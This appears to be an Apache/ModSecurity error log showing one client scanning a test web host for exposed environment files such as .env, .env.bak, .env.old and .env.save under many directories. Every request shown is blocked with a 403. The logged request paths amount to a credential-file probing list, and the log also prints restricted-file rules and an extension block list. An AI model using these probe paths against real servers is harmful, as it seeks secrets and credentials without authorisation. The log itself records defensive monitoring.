[Tue Nov 18 14:51:54.343807 2025] [:error] [pid 163656] [client 34.235.129.146:33074] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.bak"] [unique_id "aRx5-sCoCYNOyUBImXwJLwAAAAc"]
[Tue Nov 18 14:51:54.343988 2025] [:error] [pid 163656] [client 34.235.129.146:33074] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.bak"] [unique_id "aRx5-sCoCYNOyUBImXwJLwAAAAc"]
[Tue Nov 18 14:51:54.344141 2025] [:error] [pid 163656] [client 34.235.129.146:33074] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.bak"] [unique_id "aRx5-sCoCYNOyUBImXwJLwAAAAc"]
[Tue Nov 18 14:51:54.366553 2025] [:error] [pid 160881] [client 34.235.129.146:33046] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aRx5-sKvHpCFfzvQgqZezAAAAAQ"]
[Tue Nov 18 14:51:54.366719 2025] [:error] [pid 160881] [client 34.235.129.146:33046] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aRx5-sKvHpCFfzvQgqZezAAAAAQ"]
[Tue Nov 18 14:51:54.366932 2025] [:error] [pid 160881] [client 34.235.129.146:33046] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aRx5-sKvHpCFfzvQgqZezAAAAAQ"]
[Tue Nov 18 14:51:54.367115 2025] [:error] [pid 160881] [client 34.235.129.146:33046] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aRx5-sKvHpCFfzvQgqZezAAAAAQ"]
[Tue Nov 18 14:51:54.387799 2025] [:error] [pid 160237] [client 34.235.129.146:33040] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aRx5-k0XkfZCrdQo7dFhXAAAAAM"]
[Tue Nov 18 14:51:54.387999 2025] [:error] [pid 160237] [client 34.235.129.146:33040] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aRx5-k0XkfZCrdQo7dFhXAAAAAM"]
[Tue Nov 18 14:51:54.388158 2025] [:error] [pid 160237] [client 34.235.129.146:33040] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aRx5-k0XkfZCrdQo7dFhXAAAAAM"]
[Tue Nov 18 14:51:54.393763 2025] [:error] [pid 160239] [client 34.235.129.146:33104] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aRx5-u1NcONF8naoxQFe-gAAAAw"]
[Tue Nov 18 14:51:54.393928 2025] [:error] [pid 160239] [client 34.235.129.146:33104] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aRx5-u1NcONF8naoxQFe-gAAAAw"]
[Tue Nov 18 14:51:54.394104 2025] [:error] [pid 160239] [client 34.235.129.146:33104] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aRx5-u1NcONF8naoxQFe-gAAAAw"]
[Tue Nov 18 14:51:54.394263 2025] [:error] [pid 160239] [client 34.235.129.146:33104] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aRx5-u1NcONF8naoxQFe-gAAAAw"]
[Tue Nov 18 14:51:54.401322 2025] [:error] [pid 166202] [client 34.235.129.146:33124] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aRx5-rjjT4drRne9BbQurAAAAAk"]
[Tue Nov 18 14:51:54.401467 2025] [:error] [pid 166202] [client 34.235.129.146:33124] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aRx5-rjjT4drRne9BbQurAAAAAk"]
[Tue Nov 18 14:51:54.401632 2025] [:error] [pid 166202] [client 34.235.129.146:33124] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aRx5-rjjT4drRne9BbQurAAAAAk"]
[Tue Nov 18 14:51:54.401769 2025] [:error] [pid 166202] [client 34.235.129.146:33124] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aRx5-rjjT4drRne9BbQurAAAAAk"]
[Tue Nov 18 14:51:54.416285 2025] [:error] [pid 153863] [client 34.235.129.146:33058] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aRx5-uo53hvRBsk5IfbhXAAAAAA"]
[Tue Nov 18 14:51:54.416452 2025] [:error] [pid 153863] [client 34.235.129.146:33058] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aRx5-uo53hvRBsk5IfbhXAAAAAA"]
[Tue Nov 18 14:51:54.416594 2025] [:error] [pid 153863] [client 34.235.129.146:33058] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aRx5-uo53hvRBsk5IfbhXAAAAAA"]
[Tue Nov 18 14:51:54.439292 2025] [:error] [pid 160906] [client 34.235.129.146:33320] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aRx5-v7FUeIdxVPAs5igvgAAAAY"]
[Tue Nov 18 14:51:54.439450 2025] [:error] [pid 160906] [client 34.235.129.146:33320] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aRx5-v7FUeIdxVPAs5igvgAAAAY"]
[Tue Nov 18 14:51:54.439609 2025] [:error] [pid 160906] [client 34.235.129.146:33320] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aRx5-v7FUeIdxVPAs5igvgAAAAY"]
[Tue Nov 18 14:51:54.502942 2025] [authz_core:error] [pid 154301] [client 34.235.129.146:33260] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Tue Nov 18 14:51:54.572674 2025] [:error] [pid 160901] [client 34.235.129.146:33174] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aRx5-h54imVYfbO8_klVWAAAAAU"]
[Tue Nov 18 14:51:54.572875 2025] [:error] [pid 160901] [client 34.235.129.146:33174] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aRx5-h54imVYfbO8_klVWAAAAAU"]
[Tue Nov 18 14:51:54.573035 2025] [:error] [pid 160901] [client 34.235.129.146:33174] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aRx5-h54imVYfbO8_klVWAAAAAU"]
[Tue Nov 18 14:51:54.625646 2025] [:error] [pid 163656] [client 34.235.129.146:33154] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aRx5-sCoCYNOyUBImXwJMAAAAAc"]
[Tue Nov 18 14:51:54.625821 2025] [:error] [pid 163656] [client 34.235.129.146:33154] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aRx5-sCoCYNOyUBImXwJMAAAAAc"]
[Tue Nov 18 14:51:54.626031 2025] [:error] [pid 163656] [client 34.235.129.146:33154] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aRx5-sCoCYNOyUBImXwJMAAAAAc"]
[Tue Nov 18 14:51:54.626182 2025] [:error] [pid 163656] [client 34.235.129.146:33154] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aRx5-sCoCYNOyUBImXwJMAAAAAc"]
[Tue Nov 18 14:51:54.634631 2025] [:error] [pid 160881] [client 34.235.129.146:33294] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aRx5-sKvHpCFfzvQgqZezQAAAAQ"]
[Tue Nov 18 14:51:54.634826 2025] [:error] [pid 160881] [client 34.235.129.146:33294] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aRx5-sKvHpCFfzvQgqZezQAAAAQ"]
[Tue Nov 18 14:51:54.634963 2025] [:error] [pid 160881] [client 34.235.129.146:33294] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aRx5-sKvHpCFfzvQgqZezQAAAAQ"]
[Tue Nov 18 14:51:54.692127 2025] [:error] [pid 160237] [client 34.235.129.146:33170] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aRx5-k0XkfZCrdQo7dFhXQAAAAM"]
[Tue Nov 18 14:51:54.692299 2025] [:error] [pid 160237] [client 34.235.129.146:33170] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aRx5-k0XkfZCrdQo7dFhXQAAAAM"]
